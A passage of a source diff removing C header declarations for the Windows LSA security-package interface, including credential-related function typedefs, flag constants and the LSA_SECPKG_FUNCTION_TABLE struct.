-typedef NTSTATUS (WINAPI * PLSA_CALL_PACKAGE_PASSTHROUGH) (IN PUNICODE_STRING AuthenticationPackage, IN PVOID ClientBufferBase, IN PVOID ProtocolSubmitBuffer, IN ULONG SubmitBufferLength, OUT PVOID *ProtocolReturnBuffer, OUT PULONG ReturnBufferLength, OUT PNTSTATUS ProtocolStatus);
-typedef BOOLEAN (WINAPI * PLSA_GET_CALL_INFO) (OUT PSECPKG_CALL_INFO Info);
-typedef PVOID (WINAPI * PLSA_CREATE_SHARED_MEMORY) (ULONG MaxSize, ULONG InitialSize);
-typedef PVOID (WINAPI * PLSA_ALLOCATE_SHARED_MEMORY) (PVOID SharedMem, ULONG Size);
-typedef VOID (WINAPI * PLSA_FREE_SHARED_MEMORY) (PVOID SharedMem, PVOID Memory);
-typedef BOOLEAN (WINAPI * PLSA_DELETE_SHARED_MEMORY) (PVOID SharedMem);
-typedef NTSTATUS (WINAPI * PLSA_OPEN_SAM_USER) (PSECURITY_STRING Name, SECPKG_NAME_TYPE NameType, PSECURITY_STRING Prefix, BOOLEAN AllowGuest, ULONG Reserved, PVOID * UserHandle);
-typedef NTSTATUS (WINAPI * PLSA_GET_USER_CREDENTIALS) (PVOID UserHandle, PVOID * PrimaryCreds, PULONG PrimaryCredsSize, PVOID * SupplementalCreds, PULONG SupplementalCredsSize);
-typedef NTSTATUS (WINAPI * PLSA_GET_USER_AUTH_DATA) (PVOID UserHandle, PUCHAR * UserAuthData, PULONG UserAuthDataSize);
-typedef NTSTATUS (WINAPI * PLSA_CLOSE_SAM_USER) (PVOID UserHandle);
-typedef NTSTATUS (WINAPI * PLSA_GET_AUTH_DATA_FOR_USER) (PSECURITY_STRING Name, SECPKG_NAME_TYPE NameType, PSECURITY_STRING Prefix, PUCHAR * UserAuthData, PULONG UserAuthDataSize, PUNICODE_STRING UserFlatName);
-typedef NTSTATUS (WINAPI * PLSA_CONVERT_AUTH_DATA_TO_TOKEN) (IN PVOID UserAuthData, IN ULONG UserAuthDataSize, IN SECURITY_IMPERSONATION_LEVEL ImpersonationLevel, IN PTOKEN_SOURCE TokenSource, IN SECURITY_LOGON_TYPE LogonType, IN PUNICODE_STRING AuthorityName, OUT PHANDLE Token, OUT PLUID LogonId, OUT PUNICODE_STRING AccountName, OUT PNTSTATUS SubStatus);
-typedef NTSTATUS (WINAPI * PLSA_CRACK_SINGLE_NAME) (IN ULONG FormatOffered, IN BOOLEAN PerformAtGC, IN PUNICODE_STRING NameInput, IN PUNICODE_STRING Prefix OPTIONAL, IN ULONG RequestedFormat, OUT PUNICODE_STRING CrackedName, OUT PUNICODE_STRING DnsDomainName, OUT PULONG SubStatus);
-typedef NTSTATUS (WINAPI * PLSA_AUDIT_ACCOUNT_LOGON) (IN ULONG AuditId, IN BOOLEAN Success, IN PUNICODE_STRING Source, IN PUNICODE_STRING ClientName, IN PUNICODE_STRING MappedName, IN NTSTATUS Status);
-typedef NTSTATUS (WINAPI * PLSA_CLIENT_CALLBACK) (IN PCHAR Callback, IN ULONG_PTR Argument1, IN ULONG_PTR Argument2, IN PSecBuffer Input, OUT PSecBuffer Output);
-typedef NTSTATUS (WINAPI * PLSA_REGISTER_CALLBACK) (ULONG CallbackId, PLSA_CALLBACK_FUNCTION Callback);
-typedef NTSTATUS (WINAPI * PLSA_UPDATE_PRIMARY_CREDENTIALS) (IN PSECPKG_PRIMARY_CRED PrimaryCredentials, IN OPTIONAL PSECPKG_SUPPLEMENTAL_CRED_ARRAY Credentials);
-typedef VOID (WINAPI * PLSA_PROTECT_MEMORY) (IN PVOID Buffer, IN ULONG BufferSize);
-typedef NTSTATUS (WINAPI * PLSA_OPEN_TOKEN_BY_LOGON_ID) (IN PLUID LogonId, OUT HANDLE *RetTokenHandle);
-typedef NTSTATUS (WINAPI * PLSA_EXPAND_AUTH_DATA_FOR_DOMAIN) (IN PUCHAR UserAuthData, IN ULONG UserAuthDataSize, IN PVOID Reserved, OUT PUCHAR * ExpandedAuthData, OUT PULONG ExpandedAuthDataSize);
-
-
-
-#ifndef _ENCRYPTED_CREDENTIAL_DEFINED
-#define _ENCRYPTED_CREDENTIAL_DEFINED
-
-typedef struct _ENCRYPTED_CREDENTIALW {
- CREDENTIALW Cred;
- ULONG ClearCredentialBlobSize;
-} ENCRYPTED_CREDENTIALW, *PENCRYPTED_CREDENTIALW;
-#endif // _ENCRYPTED_CREDENTIAL_DEFINED
-
-#define CREDP_FLAGS_IN_PROCESS 0x01 // Caller is in-process. Password data may be returned
-#define CREDP_FLAGS_USE_MIDL_HEAP 0x02 // Allocated buffer should use MIDL_user_allocte
-#define CREDP_FLAGS_DONT_CACHE_TI 0x04 // TargetInformation shouldn't be cached for CredGetTargetInfo
-#define CREDP_FLAGS_CLEAR_PASSWORD 0x08 // Credential blob is passed in in-the-clear
-#define CREDP_FLAGS_USER_ENCRYPTED_PASSWORD 0x10 // Credential blob is passed protected by RtlEncryptMemory
-#define CREDP_FLAGS_TRUSTED_CALLER 0x20 // Caller is a trusted process (eg. logon process).
-
-typedef enum _CredParsedUserNameType
-{
- parsedUsernameInvalid = 0,
- parsedUsernameUpn,
- parsedUsernameNt4Style,
- parsedUsernameCertificate,
- parsedUsernameNonQualified
-} CredParsedUserNameType;
-
-
-typedef NTSTATUS (NTAPI CredReadFn) (IN PLUID LogonId, IN ULONG CredFlags, IN LPWSTR TargetName, IN ULONG Type, IN ULONG Flags, OUT PENCRYPTED_CREDENTIALW *Credential);
-typedef NTSTATUS (NTAPI CredReadDomainCredentialsFn) (IN PLUID LogonId, IN ULONG CredFlags, IN PCREDENTIAL_TARGET_INFORMATIONW TargetInfo, IN ULONG Flags, OUT PULONG Count, OUT PENCRYPTED_CREDENTIALW **Credential);
-
-typedef VOID (NTAPI CredFreeCredentialsFn) (IN ULONG Count, IN PENCRYPTED_CREDENTIALW *Credentials OPTIONAL);
-typedef NTSTATUS (NTAPI CredWriteFn) (IN PLUID LogonId, IN ULONG CredFlags, IN PENCRYPTED_CREDENTIALW Credential, IN ULONG Flags);
-typedef NTSTATUS (NTAPI CrediUnmarshalandDecodeStringFn)(IN LPWSTR MarshaledString, OUT LPBYTE *Blob, OUT ULONG *BlobSize, OUT BOOLEAN *IsFailureFatal);
-
-typedef struct _LSA_SECPKG_FUNCTION_TABLE {
- PLSA_CREATE_LOGON_SESSION CreateLogonSession;
- PLSA_DELETE_LOGON_SESSION DeleteLogonSession;
- PLSA_ADD_CREDENTIAL AddCredential;
- PLSA_GET_CREDENTIALS GetCredentials;
- PLSA_DELETE_CREDENTIAL DeleteCredential;
- PLSA_ALLOCATE_LSA_HEAP AllocateLsaHeap;
- PLSA_FREE_LSA_HEAP FreeLsaHeap;
- PLSA_ALLOCATE_CLIENT_BUFFER AllocateClientBuffer;
- PLSA_FREE_CLIENT_BUFFER FreeClientBuffer;
- PLSA_COPY_TO_CLIENT_BUFFER CopyToClientBuffer;
- PLSA_COPY_FROM_CLIENT_BUFFER CopyFromClientBuffer;
- PLSA_IMPERSONATE_CLIENT ImpersonateClient;
- PLSA_UNLOAD_PACKAGE UnloadPackage;
- PLSA_DUPLICATE_HANDLE DuplicateHandle;
- PLSA_SAVE_SUPPLEMENTAL_CREDENTIALS SaveSupplementalCredentials;
- PLSA_CREATE_THREAD CreateThread;
- PLSA_GET_CLIENT_INFO GetClientInfo;
- PLSA_REGISTER_NOTIFICATION RegisterNotification;
- PLSA_CANCEL_NOTIFICATION CancelNotification;
- PLSA_MAP_BUFFER MapBuffer;
- PLSA_CREATE_TOKEN CreateToken;
- PLSA_AUDIT_LOGON AuditLogon;
- PLSA_CALL_PACKAGE CallPackage;
- PLSA_FREE_LSA_HEAP FreeReturnBuffer;
- PLSA_GET_CALL_INFO GetCallInfo;
- PLSA_CALL_PACKAGEEX CallPackageEx;
- PLSA_CREATE_SHARED_MEMORY CreateSharedMemory;
- PLSA_ALLOCATE_SHARED_MEMORY AllocateSharedMemory;
- PLSA_FREE_SHARED_MEMORY FreeSharedMemory;
- PLSA_DELETE_SHARED_MEMORY DeleteSharedMemory;
- PLSA_OPEN_SAM_USER OpenSamUser;
- PLSA_GET_USER_CREDENTIALS GetUserCredentials;
- PLSA_GET_USER_AUTH_DATA GetUserAuthData;
- PLSA_CLOSE_SAM_USER CloseSamUser;
- PLSA_CONVERT_AUTH_DATA_TO_TOKEN ConvertAuthDataToToken;
- PLSA_CLIENT_CALLBACK ClientCallback;
- PLSA_UPDATE_PRIMARY_CREDENTIALS UpdateCredentials;
- PLSA_GET_AUTH_DATA_FOR_USER GetAuthDataForUser;
- PLSA_CRACK_SINGLE_NAME CrackSingleName;
- PLSA_AUDIT_ACCOUNT_LOGON AuditAccountLogon;
- PLSA_CALL_PACKAGE_PASSTHROUGH CallPackagePassthrough;
- CredReadFn *CrediRead;
- CredReadDomainCredentialsFn *CrediReadDomainCredentials;
- CredFreeCredentialsFn *CrediFreeCredentials;
- PLSA_PROTECT_MEMORY LsaProtectMemory;
- PLSA_PROTECT_MEMORY LsaUnprotectMemory;
- PLSA_OPEN_TOKEN_BY_LOGON_ID OpenTokenByLogonId;
- PLSA_EXPAND_AUTH_DATA_FOR_DOMAIN ExpandAuthDataForDomain;
- PLSA_ALLOCATE_PRIVATE_HEAP AllocatePrivateHeap;
- PLSA_FREE_PRIVATE_HEAP FreePrivateHeap;
- PLSA_CREATE_TOKEN_EX CreateTokenEx;
- CredWriteFn *CrediWrite;
- CrediUnmarshalandDecodeStringFn *CrediUnmarshalandDecodeString;
-} LSA_SECPKG_FUNCTION_TABLE, *PLSA_SECPKG_FUNCTION_TABLE;